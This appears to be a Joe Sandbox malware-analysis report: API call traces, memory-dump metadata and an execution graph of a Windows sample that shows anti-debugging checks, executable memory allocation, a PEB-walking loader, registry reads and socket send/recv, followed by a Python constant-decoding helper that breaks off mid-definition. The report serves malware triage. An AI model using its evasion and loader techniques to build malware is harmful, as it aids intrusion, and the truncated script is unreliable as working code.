                                                                        • Opcode ID: 544d3954bd9259e5cf05ecae5d3949c13b1dcdcecd66bafec25ca46482e0efda
                                                                        • Instruction ID: dc8b34ad8d16173078f4edf7f8462ab13c3edaa2e9d01a87ea43c7f44cf4d683
                                                                        • Opcode Fuzzy Hash: 544d3954bd9259e5cf05ecae5d3949c13b1dcdcecd66bafec25ca46482e0efda
                                                                        • Instruction Fuzzy Hash: AE01A270684344BFFB14EFA4DC8AF3AB7EDEB08B04F5008B0B905D6640C675ED189A29
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C6823C,?,?,00000000,?,02C67A7E,ntdll,00000000,00000000,02C67AC3,?,?,00000000), ref: 02C6820A
                                                                          • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                        • GetModuleHandleA.KERNELBASE(?), ref: 02C6821E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$AddressProc
                                                                        • String ID: AeldnaHeludoMteG$KernelBASE
                                                                        • API String ID: 1883125708-1952140341
                                                                        • Opcode ID: 818c6b07f7d6c040afbb133ad94d7b73cdde10391e5d2dd585271af686ebf2af
                                                                        • Instruction ID: 21b56f80235547b119b53ed26cc3b79bb87e61157f8c2d4c2a54099c3efa9061
                                                                        • Opcode Fuzzy Hash: 818c6b07f7d6c040afbb133ad94d7b73cdde10391e5d2dd585271af686ebf2af
                                                                        • Instruction Fuzzy Hash: B5F09670A84704AFEB14FFA4DC85A6DB7EDE74A7007514A61B900C3610D634AE58D929
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(KernelBase,?,02C6FAEB,UacInitialize,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,ScanBuffer,02CD7380,02C7B7B8,ScanString,02CD7380,02C7B7B8,Initialize), ref: 02C6F6EE
                                                                        • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02C6F700
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: IsDebuggerPresent$KernelBase
                                                                        • API String ID: 1646373207-2367923768
                                                                        • Opcode ID: 2e17d29711c695e13178e45fdbb4175d5895c077dd0d2555eadbfb3470e02032
                                                                        • Instruction ID: 8ffdb28faa831c0f6786b69723e92ee35691ca4b242abc0abea6018ede7d5e2a
                                                                        • Opcode Fuzzy Hash: 2e17d29711c695e13178e45fdbb4175d5895c077dd0d2555eadbfb3470e02032
                                                                        • Instruction Fuzzy Hash: 6DD012A235436019BE00B2F43CC882903CC856452D3341F34F523C6592E9B6C8956018
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,02C7D10B,00000000,02C7D11E), ref: 02C5C47A
                                                                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02C5C48B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                        • API String ID: 1646373207-3712701948
                                                                        • Opcode ID: 37ad7bf4dc628a44f4e027d1eb1ece8a595e0008a329384d0546d0bf498af84f
                                                                        • Instruction ID: 645374b63d2fe61bcda0ef48e4c475feb6be277c4c6d7baacfdce668ed0b873b
                                                                        • Opcode Fuzzy Hash: 37ad7bf4dc628a44f4e027d1eb1ece8a595e0008a329384d0546d0bf498af84f
                                                                        • Instruction Fuzzy Hash: 25D05EE1A403745AEB00AAB95880B3122DDCB58314B108A66EC0159102EB72D6D88F1C
                                                                        APIs
                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02C5E297
                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02C5E2B3
                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02C5E32A
                                                                        • VariantClear.OLEAUT32(?), ref: 02C5E353
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                        • String ID:
                                                                        • API String ID: 920484758-0
                                                                        • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                        • Instruction ID: 664f45f83d5560563a043b213698c8ef950e35b784e9f8b03cc97be947ccd164
                                                                        • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                        • Instruction Fuzzy Hash: 0F41F975A016299BCB62DF58CC90BCAB3BDAF49314F0041D5EA4DA7212DA30EFC19F58
                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C5AD59
                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C5AD7D
                                                                        • GetModuleFileNameA.KERNEL32(02C50000,?,00000105), ref: 02C5AD98
                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02C5AE2E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                        • String ID:
                                                                        • API String ID: 3990497365-0
                                                                        • Opcode ID: 7b01b9f4bafe5681518b1eeaad4b56e424d391fb5024272a4f64e32b8dc4c02c
                                                                        • Instruction ID: 2030d175f4c4812b196e6d80aada7a20850b81f2daf7d841e25e7e747c3ffb2e
                                                                        • Opcode Fuzzy Hash: 7b01b9f4bafe5681518b1eeaad4b56e424d391fb5024272a4f64e32b8dc4c02c
                                                                        • Instruction Fuzzy Hash: C2411D709402689BDB61DB69CC84BDAB7FDAB48340F4401E5A948E7241DB74DFC4DF58
                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C5AD59
                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C5AD7D
                                                                        • GetModuleFileNameA.KERNEL32(02C50000,?,00000105), ref: 02C5AD98
                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02C5AE2E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                        • String ID:
                                                                        • API String ID: 3990497365-0
                                                                        • Opcode ID: 64cc70f0679fcf327f0622fb8a752d428b28a0c87bd591ec55bd616a694101f0
                                                                        • Instruction ID: 1a960c431ff1d13a2b79f67d34124a9be22853a2428644c858afa8ab2bbbe8a8
                                                                        • Opcode Fuzzy Hash: 64cc70f0679fcf327f0622fb8a752d428b28a0c87bd591ec55bd616a694101f0
                                                                        • Instruction Fuzzy Hash: 0F412D70A402689BDB61EB59CC84BDAB7FDAB48340F4401E5A948E7241DB74DFC4DF58
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 07d1675badda0b8dbd9fc5a9bbc5dcdcc9c517e9b82bfb7f6ce62c9d5711a0ce
                                                                        • Instruction ID: 5dd1c60d70b067fc0fb57eea394860a3fcf595ba08f7df52483e142952a3e0a9
                                                                        • Opcode Fuzzy Hash: 07d1675badda0b8dbd9fc5a9bbc5dcdcc9c517e9b82bfb7f6ce62c9d5711a0ce
                                                                        • Instruction Fuzzy Hash: 20A1D6767106200BD719AA7C9C8C3BDB3C2DBC4225F1D467EE91DCB281EBE5C9829658
                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02C595DA), ref: 02C59572
                                                                        • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02C595DA), ref: 02C59578
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: DateFormatLocaleThread
                                                                        • String ID: yyyy
                                                                        • API String ID: 3303714858-3145165042
                                                                        • Opcode ID: 1569dc0ff39a4f94d839949884e2721f27abcdde4aad51cf7c6ee79cfc71e3d8
                                                                        • Instruction ID: e95b6acee1387a95a554c94573252a14f1dade3c8595ef17ad8986963cc0bfa2
                                                                        • Opcode Fuzzy Hash: 1569dc0ff39a4f94d839949884e2721f27abcdde4aad51cf7c6ee79cfc71e3d8
                                                                        • Instruction Fuzzy Hash: E2215171A00268DFDB15DFA4C981AAE73B9EF49700F9101A5EC05D7250D730DED0DBA9
                                                                        APIs
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C6823C,?,?,00000000,?,02C67A7E,ntdll,00000000,00000000,02C67AC3,?,?,00000000), ref: 02C6820A
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNELBASE(?), ref: 02C6821E
                                                                          • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                        • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02C683C2), ref: 02C683A4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                        • String ID: FlushInstructionCache$Kernel32
                                                                        • API String ID: 3811539418-184458249
                                                                        • Opcode ID: fc20f468746b1e7f3e893fe3afa94bbc90508a86953a629c407bd3628d391f33
                                                                        • Instruction ID: 683e68ad02598cf258fbcf27bc19108f6f96412e6a66bc81346812e7efb466d0
                                                                        • Opcode Fuzzy Hash: fc20f468746b1e7f3e893fe3afa94bbc90508a86953a629c407bd3628d391f33
                                                                        • Instruction Fuzzy Hash: E1016D71680304AFEB14EFA4DC85F6A77EDEB08B00F514570B908D6640D674ED689A28
                                                                        APIs
                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02C6AF58
                                                                        • IsBadWritePtr.KERNEL32(?,00000004), ref: 02C6AF88
                                                                        • IsBadReadPtr.KERNEL32(?,00000008), ref: 02C6AFA7
                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02C6AFB3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Read$Write
                                                                        • String ID:
                                                                        • API String ID: 3448952669-0
                                                                        • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                        • Instruction ID: 6b7772208712ee924caa84ed9374b2f68413aa54d129ca6b325515fd0c96b027
                                                                        • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                        • Instruction Fuzzy Hash: 2A21B4B26406199FDB10DF69CCC4BBE73A9EF90355F104511FD14A7380DB35E9118AAA

                                                                        Execution Graph

                                                                        Execution Coverage:1.5%
                                                                        Dynamic/Decrypted Code Coverage:98.9%
                                                                        Signature Coverage:4.9%
                                                                        Total number of Nodes:1027
                                                                        Total number of Limit Nodes:42
                                                                        execution_graph 96456 29156c6d 96462 29156d42 recv 96456->96462 96463 29156cdc 96468 29156d59 send 96463->96468 96469 2914e04e 96470 2914e063 ctype ___scrt_fastfail 96469->96470 96471 2914e266 96470->96471 96488 29162f55 21 API calls new 96470->96488 96477 2914e21a 96471->96477 96483 2914dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 96471->96483 96474 2914e277 96474->96477 96484 29162f55 21 API calls new 96474->96484 96476 2914e213 ___scrt_fastfail 96476->96477 96489 29162f55 21 API calls new 96476->96489 96479 2914e2b0 ___scrt_fastfail 96479->96477 96485 291635db 96479->96485 96481 2914e240 ___scrt_fastfail 96481->96477 96490 29162f55 21 API calls new 96481->96490 96483->96474 96484->96479 96491 291634fa 96485->96491 96487 291635e3 96487->96477 96488->96476 96489->96481 96490->96471 96492 29163513 96491->96492 96496 29163509 96491->96496 96492->96496 96497 29162f55 21 API calls new 96492->96497 96494 29163534 96494->96496 96498 291638c8 CryptAcquireContextA 96494->96498 96496->96487 96497->96494 96499 291638e4 96498->96499 96500 291638e9 CryptGenRandom 96498->96500 96499->96496 96500->96499 96501 291638fe CryptReleaseContext 96500->96501 96501->96499 96502 44210f9 96505 4421120 96502->96505 96506 4421152 96505->96506 96507 442127a VirtualAlloc 96506->96507 96514 442110f 96506->96514 96508 44212aa VirtualAlloc 96507->96508 96512 44212bd GetPEB 96507->96512 96508->96512 96508->96514 96510 4421386 96511 442143e GetPEB 96510->96511 96513 44213ef LoadLibraryA 96510->96513 96511->96514 96512->96510 96513->96510 96513->96514 96515 29164918 96516 29164924 ___DestructExceptionObject 96515->96516 96542 29164627 96516->96542 96518 2916492b 96520 29164954 96518->96520 96840 29164a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96518->96840 96528 29164993 ___scrt_is_nonwritable_in_current_image 
___scrt_release_startup_lock 96520->96528 96841 291742d2 5 API calls _ValidateLocalCookies 96520->96841 96522 2916496d 96524 29164973 ___DestructExceptionObject 96522->96524 96842 29174276 5 API calls _ValidateLocalCookies 96522->96842 96525 291649f3 96553 29164ba5 96525->96553 96528->96525 96843 29173487 36 API calls 4 library calls 96528->96843 96535 29164a15 96536 29164a1f 96535->96536 96845 291734bf 28 API calls _Atexit 96535->96845 96538 29164a28 96536->96538 96846 29173462 28 API calls _Atexit 96536->96846 96847 2916479e 13 API calls 2 library calls 96538->96847 96541 29164a30 96541->96524 96543 29164630 96542->96543 96848 29164cb6 IsProcessorFeaturePresent 96543->96848 96545 2916463c 96849 29168fb1 10 API calls 4 library calls 96545->96849 96547 29164641 96548 29164645 96547->96548 96850 2917415f IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96547->96850 96548->96518 96550 2916464e 96551 2916465c 96550->96551 96851 29168fda 8 API calls 3 library calls 96550->96851 96551->96518 96852 29166f10 96553->96852 96556 291649f9 96557 29174223 96556->96557 96854 2917f0d9 96557->96854 96559 2917422c 96561 29164a02 96559->96561 96858 29176895 36 API calls 96559->96858 96562 2913ea00 96561->96562 96860 2914cbe1 LoadLibraryA GetProcAddress 96562->96860 96564 2913ea1c GetModuleFileNameW 96865 2913f3fe 96564->96865 96566 2913ea38 96880 291320f6 96566->96880 96569 291320f6 28 API calls 96570 2913ea56 96569->96570 96886 2914beac 96570->96886 96574 2913ea68 96912 29131e8d 96574->96912 96576 2913ea71 96577 2913ea84 96576->96577 96578 2913eace 96576->96578 97180 2913fbee 118 API calls 96577->97180 96918 29131e65 96578->96918 96581 2913eade 96585 29131e65 22 API calls 96581->96585 96582 2913ea96 96583 29131e65 22 API calls 96582->96583 96584 2913eaa2 96583->96584 97181 29140f72 36 API calls __EH_prolog 96584->97181 96586 2913eafd 96585->96586 96923 2913531e 96586->96923 96589 2913eb0c 96928 29136383 96589->96928 

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 29143584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 291435A4
                                                                          • Part of subcall function 29143584: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,291A52F0), ref: 291435C2
                                                                          • Part of subcall function 29143584: RegCloseKey.KERNEL32(?), ref: 291435CD
                                                                        • Sleep.KERNEL32(00000BB8), ref: 2913F896
                                                                        • ExitProcess.KERNEL32 ref: 2913F905
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseExitOpenProcessQuerySleepValue
                                                                        • String ID: 5.1.2 Pro$override$pth_unenc
                                                                        • API String ID: 2281282204-3554326054
                                                                        • Opcode ID: 03c21af717002b2485bc6adb80963b03b55d0df3c5be62a998a5488d6fc6e911
                                                                        • Instruction ID: be4c7492a8e3bb1e66040be62659f1e9125b89b0db3b8c00056f3c52bf7182fd
                                                                        • Opcode Fuzzy Hash: 03c21af717002b2485bc6adb80963b03b55d0df3c5be62a998a5488d6fc6e911
                                                                        • Instruction Fuzzy Hash: 21210521F1020077F68C76778C95A6E39BA6FA4518FC0A91CE40557289EE249F0B87AB

                                                                        Control-flow Graph

• Control-flow graph omitted (function 4421120-4421511); only node and edge identifiers survive. API calls visible in its nodes: VirtualAlloc at 442127a and 44212aa, PEB reads (GetPEB) at 4421370 and 442143e, LoadLibraryA at 44213ef. The remaining nodes are loops with no API calls, consistent with a position-independent loader that walks the PEB module list to locate its imports before loading further libraries.
                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(?,?,00003000,00000040,?,?,?,?,00000000,?,?,?,00000000), ref: 044212A3
                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,?,?,00000000,?,?,?,00000000,?,?,?,00007463), ref: 044212B3
                                                                        • LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00000000,?,?,?,00007463,?,?,?,00000000), ref: 044213FA
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual$LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 2441068224-0
                                                                        • Opcode ID: fd56b6eb53f1cdb5fdd0890e38ea0e2cb1b853ca5e084496af12267c0617299e
                                                                        • Instruction ID: 76ce5bdf4ea824e759a70c9eb8f4c136e6a7add6ef52d21f754d5bb7e236c4a8
                                                                        • Opcode Fuzzy Hash: fd56b6eb53f1cdb5fdd0890e38ea0e2cb1b853ca5e084496af12267c0617299e
                                                                        • Instruction Fuzzy Hash: 68D17D31A00215AFEF24CF69C985BAEB7B5FF45310F54816AE84AAB745DB30B941CB90
                                                                        APIs
                                                                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,29163550,00000034,?,?,025ED9A0), ref: 291638DA
                                                                        • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,291635E3,00000000,?,00000000), ref: 291638F0
                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,291635E3,00000000,?,00000000,2914E2E2), ref: 29163902
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Crypt$Context$AcquireRandomRelease
                                                                        • String ID:
                                                                        • API String ID: 1815803762-0
                                                                        • Opcode ID: 9f67f527a0e521e6aa37bbe0b67e254d1adf700b2a5540bd0acf6eadaa655484
                                                                        • Instruction ID: a7c07aa634ecce390b08365d332ccb023634de5fe271dfde2bf324e6449cf7d9
                                                                        • Opcode Fuzzy Hash: 9f67f527a0e521e6aa37bbe0b67e254d1adf700b2a5540bd0acf6eadaa655484
                                                                        • Instruction Fuzzy Hash: 5FE09231B18250BBF7301E17EC09F863AADFB817A4F210639F225E50E8D6524512E654
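The API records above print every argument as a raw hexadecimal stack slot, so the triage-relevant facts (an RWX allocation, which registry hive is opened and with what access, how long the sample sleeps, which CryptoAPI provider is requested) have to be decoded by hand. The following Python helper is an added example, not part of the Joe Sandbox report or its tooling: it parses lines in the report's `API.MODULE(args), ref: ADDR` format and decodes the constants for VirtualAlloc, RegOpenKeyExA, Sleep and CryptAcquireContextA. The sample lines are copied verbatim from the VirtualAlloc/LoadLibraryA, registry/Sleep and CryptAcquireContextA records on this page; the constant tables are Windows SDK values. It assumes, as the report's layout implies, that arguments are listed in calling order and that slots past the documented parameter count are stack residue to be ignored.

```python
import re

# Windows SDK constants used to decode the hexadecimal arguments Joe Sandbox prints.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET",
             0x100000: "MEM_TOP_DOWN", 0x20000000: "MEM_LARGE_PAGES"}
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
HKEY_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_ACCESS = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
PROV_TYPES = {1: "PROV_RSA_FULL", 24: "PROV_RSA_AES"}
CRYPT_FLAGS = {0xF0000000: "CRYPT_VERIFYCONTEXT", 0x8: "CRYPT_NEWKEYSET",
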